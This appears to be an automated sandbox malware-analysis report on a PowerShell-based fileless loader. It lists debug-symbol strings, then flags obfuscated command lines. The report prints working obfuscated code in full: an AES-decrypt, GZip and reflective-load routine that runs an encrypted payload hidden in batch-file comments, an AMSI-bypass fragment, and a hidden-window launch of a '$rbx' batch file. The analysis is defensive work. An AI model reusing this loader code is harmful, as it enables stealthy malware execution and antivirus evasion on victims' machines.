Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Security.pdbP source: WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Drawing.pdb0 source: WER8767.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.Install.pdb }b source: WER8767.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: mscorlib.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: mscorlib.pdb:\W source: WER8767.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000030.00000002.2995887464.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Xml.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.DirectoryServices.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.pdbP4 source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Data.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Windows.Forms.pdb` source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Xml.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000030.00000002.2995887464.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Data.pdbH source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Windows.Forms.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.Automation.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.Automation.pdb3 source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Drawing.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Transactions.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.Install.pdbh source: WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.pdbiy source: WER8767.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbP source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Transactions.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb N source: WER643A.tmp.dmp.27.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Numerics.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.CSharp.pdb@ source: WER643A.tmp.dmp.27.dr
Source: Binary string: System.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: DetailSequence=1DetailTotal=1SequenceNumber=27UserId=WORKGROUP\SYSTEMHostName=ConsoleHostHostVersion=5.1.19041.1682HostId=0f51ebcb-4e35-4f5f-b895-e71e4c7e1427HostApplication=C:\Windows\System32\Window
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($vMVwdwXXnratZh,$SlSshRHzgoUjvXmeTqL).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$awqsGjGjE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+'r'+[Char](98
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+'eTy'+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WLjbMWfHUpI.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uwMlljVVwbVUVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');$WLjbMWfHUpI.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'ew'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rt'+'u'+''+[Char](97)+''+[Char](108)+'',$qJfzFIqcrY,$uwMlljVVwbVUVD).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $WLjbMWfHUpI.CreateType();}$ulnmlpDbsuVQN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+'Wi'+'n'+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+'t'+'i'+''+[Char](118)+'eM'+[Char](101)
Suspicious command line found
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden Jump to behavior
